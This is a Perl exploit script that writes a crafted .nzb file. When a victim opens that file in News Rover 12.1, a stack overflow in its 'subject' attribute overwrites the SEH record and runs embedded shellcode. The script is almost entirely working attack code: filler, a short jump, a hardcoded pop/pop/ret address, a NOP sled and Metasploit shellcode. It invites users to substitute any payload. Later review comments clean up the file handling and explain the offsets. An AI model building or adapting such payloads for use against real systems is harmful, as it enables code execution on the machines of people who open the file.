
# Title : News Rover 12.1 Rev 1 Remote Stack Overflow Exploit (perl)
# Published : 2007-02-24
# Author : Umesh Wanve


#!/usr/bin/perl
# ===============================================================================================
#                News Rover 12.1 Rev 1 Remote Stack Overflow perl exploit 
#                               By Umesh Wanve (umesh_345@yahoo.com)
# ==============================================================================================          
# Credits : Originally discovered and coded in c by Marsu <MarsupilamiPowa@hotmail.fr>
#
# Reference : http://www.securityfocus.com/bid/22618
#
# Date : 24-02-2007
#
# This is converted into perl for perl lovers.
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
# 
# A stack overflow exists in the "subject" attribute of a <file> element in a .nzb file.
# Despite the word "Remote" in the title, this is a client-side file-format bug: the
# crafted .nzb has to be opened by the victim in News Rover for the payload to run.
# A subject longer than 2022 bytes overwrites the SEH record on the stack, so the
# crafted subject is laid out as:
# Subject =  filler  + short jmp to shellcode (next-SEH pointer) + SEH handler (pop/pop/ret) + NOP sled + shellcode
#         <-2022 B->  <----------------4 bytes------------------>  <----------4 bytes------->  <-15 B->   <-164 B->
#
# SEH handler address 0x750211a9 is a pop/pop/ret taken from the Metasploit opcode database
# (WS2HELP.DLL, Windows 2000 SP4). "Universal" only holds for that OS/service-pack build:
# on any other Windows version or patch level, look up a fresh pop/pop/ret and change it.
#
# This was written for fun. Use it at your own risk.
#
# Special thanks to Marsu (bug discovery and original C exploit). :)
# Also thanks to Metasploit for their great opcode database.
#
#================================================================================================

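use strict;
use warnings;

# ---------------------------------------------------------------------------
# Builds poc.nzb: a .nzb file whose <file subject="..."> attribute overflows a
# stack buffer in News Rover 12.1 and overwrites the SEH record.
#
# Subject layout (offsets follow from the constants below):
#   [0..2021]    2022 filler bytes
#   [2022..2025] next-SEH pointer  : "\xeb\x15\x90\x90"  (short jmp +0x15, 2 NOPs)
#   [2026..2029] SEH handler       : pop/pop/ret address
#   [2030..2044] 15-byte NOP sled
#   [2045..]     shellcode
# The jmp at 2022 is relative to the instruction after it (offset 2024);
# 2024 + 0x15 = 2045, i.e. it skips the two padding NOPs, the 4-byte handler
# and the 15-byte sled and lands exactly on the first shellcode byte.
#
# Side effect: writes (and overwrites) ./poc.nzb in the current directory.
# ---------------------------------------------------------------------------

my $buffer = 'A' x 2022;                      # filler up to the SEH record

my $short_jmp = "\xeb\x15\x90\x90";           # next-SEH: jmp short +0x15, padded with NOPs

# pop, pop, ret in WS2HELP.DLL on Windows 2000 SP4 (0x750211a9, little-endian).
# NOTE(review): this address is tied to that exact OS/service-pack build of
# ws2help.dll; it is not "universal" across Windows versions. Re-find it for
# any other target.
my $seh_handler = "\xa9\x11\x02\x75";

my $nop = "\x90" x 15;                        # NOP sled between handler and shellcode

# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
# Replace with any payload of your choice; the bytes below are used verbatim.
my $shellcode =
    "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4" .
    "\xb2\x82\x70\x83\xeb\xfc\xe2\xf4\x58\x5a\xc6\x70\xa4\xb2\x09\x35" .
    "\x98\x39\xfe\x75\xdc\xb3\x6d\xfb\xeb\xaa\x09\x2f\x84\xb3\x69\x39" .
    "\x2f\x86\x09\x71\x4a\x83\x42\xe9\x08\x36\x42\x04\xa3\x73\x48\x7d" .
    "\xa5\x70\x69\x84\x9f\xe6\xa6\x74\xd1\x57\x09\x2f\x80\xb3\x69\x16" .
    "\x2f\xbe\xc9\xfb\xfb\xae\x83\x9b\x2f\xae\x09\x71\x4f\x3b\xde\x54" .
    "\xa0\x71\xb3\xb0\xc0\x39\xc2\x40\x21\x72\xfa\x7c\x2f\xf2\x8e\xfb" .
    "\xd4\xae\x2f\xfb\xcc\xba\x69\x79\x2f\x32\x32\x70\xa4\xb2\x09\x18" .
    "\x98\xed\xb3\x86\xc4\xe4\x0b\x88\x27\x72\xf9\x20\xcc\x42\x08\x74" .
    "\xfb\xda\x1a\x8e\x2e\xbc\xd5\x8f\x43\xd1\xe3\x1c\xc7\x9c\xe7\x08" .
    "\xc1\xb2\x82\x70";

# NZB envelope around the malicious <file> element.
my $file_header =
    "<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n" .
    "<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n" .
    "<!-- NZB Generated by Umesh Wanve -->\n" .
    "<nzb xmlns=\"http://www.google.com\">\n\n";

my $file_end =
    "</segment>\n" .
    "</segments>\n" .
    "</file>\n" .
    "</nzb>\n";

# Three-arg open on a lexical handle, with the error checked: a silently
# failed open would otherwise leave the user with no file and no message.
my $outfile = 'poc.nzb';
open my $out, '>', $outfile or die "Cannot open $outfile for writing: $!";

# The handle is left in text mode, as in the original. None of the payload
# bytes above is 0x0a, so on Windows only the "\n" of the XML wrapper is
# subject to newline translation.
print {$out} $file_header;

# Vulnerable SUBJECT attribute: opened here, closed after the payload.
print {$out} "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";
print {$out} $buffer, $short_jmp, $seh_handler, $nop, $shellcode;
print {$out} "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";

print {$out} $file_end;

# close() is where buffered write errors surface; the original closed a
# handle it never opened (OUTFILE vs OUTPUTFILE), so nothing was checked.
close $out or die "Cannot close $outfile: $!";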

